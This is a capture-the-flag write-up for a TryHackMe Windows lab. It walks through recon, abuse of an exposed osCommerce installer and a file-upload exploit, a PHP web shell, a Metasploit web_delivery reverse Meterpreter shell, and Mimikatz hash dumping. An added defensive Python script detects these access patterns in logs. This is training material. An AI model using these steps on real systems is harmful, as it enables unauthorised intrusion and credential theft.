THM-Blueprint-Writeup
Hack into this Windows machine and escalate your privileges to Administrator.
Find This Room: Blueprint
Description
Blueprint is an easy-level boot2root machine on TryHackMe. The machine runs Windows 7 and hosts a web server on port 443. That web server serves an outdated version of osCommerce. After finding the web app's install directory still exposed, we could run the osCommerce installer ourselves. After that, an arbitrary file upload vulnerability was used to upload a web shell. Finally, this web shell was used to gain a Meterpreter session on the box with SYSTEM privileges.
Recon
First of all, an Nmap scan was started.
sudo nmap -sC -sV -O 10.10.242.9 -oN nmap/inital -vv
After the scan, a few services could be found on the target machine. Through SMB we had access to sensitive data without authentication.
On port 80 the web server is not serving anything interesting.
On port 443, however, directory indexing is enabled, and we could find an outdated version of osCommerce.
After navigating to /oscommerce-2.3.4/catalog/ and opening the developer tools, the web server seemed to make requests to localhost.
For further enumeration, the /etc/hosts file had to be changed.
Next, a gobuster scan was started. It found a directory called “install”.
gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://10.10.242.9/oscommerce-2.3.4/catalog/ -k -e
After navigating to the URL https://10.10.242.9/oscommerce-2.3.4/catalog/install we had the opportunity to install the web app.
During installation I used the username “root” and a blank password for the database. Furthermore, an admin user was created with the username and password “admin”.
Since this version of osCommerce is outdated, public exploits exist for the web app. The arbitrary file upload vulnerability was used.
searchsploit oscommerce 2.3.4
The exploit can be copied to the current working directory with the following command:
searchsploit -m php/webapps/43191.py
Next, a simple PHP web shell was created.
This web shell could be uploaded successfully by utilizing the file upload vulnerability.
By running the command whoami through the web shell, the output showed that the service was running as NT AUTHORITY\SYSTEM.
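As an added defender-side example (not part of the original writeup), the following Python script audits constructed web server access log lines for the two conditions this attack path relied on: the osCommerce install directory still being reachable, and a PHP script being served from a directory that should only hold uploaded static content. The log format, the sample lines and the /images/ upload directory are assumptions, not details taken from the room.

```python
import re
from collections import namedtuple
from urllib.parse import unquote

# Apache "combined"-style access log line (assumed format for this example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample traffic, not a capture from the room.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /oscommerce-2.3.4/catalog/install/ HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2024:12:00:05 +0000] "POST /oscommerce-2.3.4/catalog/install/index.php?step=3 HTTP/1.1" 200 2048
10.0.0.9 - - [10/Mar/2024:12:00:30 +0000] "GET /oscommerce-2.3.4/catalog/index.php HTTP/1.1" 200 5000
10.0.0.5 - - [10/Mar/2024:12:01:15 +0000] "GET /oscommerce-2.3.4/catalog/images/shell.php?cmd=whoami HTTP/1.1" 200 80
10.0.0.9 - - [10/Mar/2024:12:01:40 +0000] "GET /oscommerce-2.3.4/catalog/images/logo.png HTTP/1.1" 200 9000
"""

Finding = namedtuple("Finding", "ip rule path")

# Directories that should only ever serve static, user-uploaded content (assumed).
UPLOAD_DIRS = ("/images/",)
# Windows file systems are case-insensitive, so /INSTALL/ is the same directory as /install/.
INSTALL_RE = re.compile(r"/install(?:/|$)", re.IGNORECASE)
SCRIPT_EXT = (".php", ".phtml", ".php5")


def audit_line(line):
    """Return a Finding for one successful, suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m or int(m.group("status")) >= 400:
        return None  # unparseable, or the server refused the request anyway
    # Decode %-escapes and drop the query string before matching on the path.
    path = unquote(m.group("path").split("?", 1)[0])
    if INSTALL_RE.search(path):
        return Finding(m.group("ip"), "install-dir-reachable", path)
    in_upload_dir = any(d in path.lower() for d in UPLOAD_DIRS)
    if in_upload_dir and path.lower().endswith(SCRIPT_EXT):
        return Finding(m.group("ip"), "script-in-upload-dir", path)
    return None


def audit_log(text):
    """Run audit_line over every line of an access log and collect the findings."""
    return [f for f in map(audit_line, text.splitlines()) if f]


if __name__ == "__main__":
    for finding in audit_log(SAMPLE_LOG):
        print(f"{finding.rule:22} {finding.ip:10} {finding.path}")
```

Removing the install directory after setup and forbidding script execution in upload directories are the fixes these two rules point at.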
Initial Access
To get a shell on the box I have utilized the Metasploit module multi/script/web_delivery. After starting Metasploit, the following commands have been run:
use multi/script/web_delivery
set LHOST <tun0>
set SRVHOST <tun0 ip>
set payload windows/meterpreter/reverse_tcp
set target 3
run
Finally, the module printed a command. This command could be executed via the web shell, and after executing it a Meterpreter session was opened.
With Meterpreter we could drop into a command shell and retrieve the root flag.
Cracking the NTLM hash for the user “Lab”
Mimikatz was used to retrieve NTLM hashes. Mimikatz can be loaded via the command load mimikatz.
After successfully loading the module, the hashes could be dumped via the command lsa_dump_sam.
Finally, Lab’s hash could be cracked on “CrackStation”.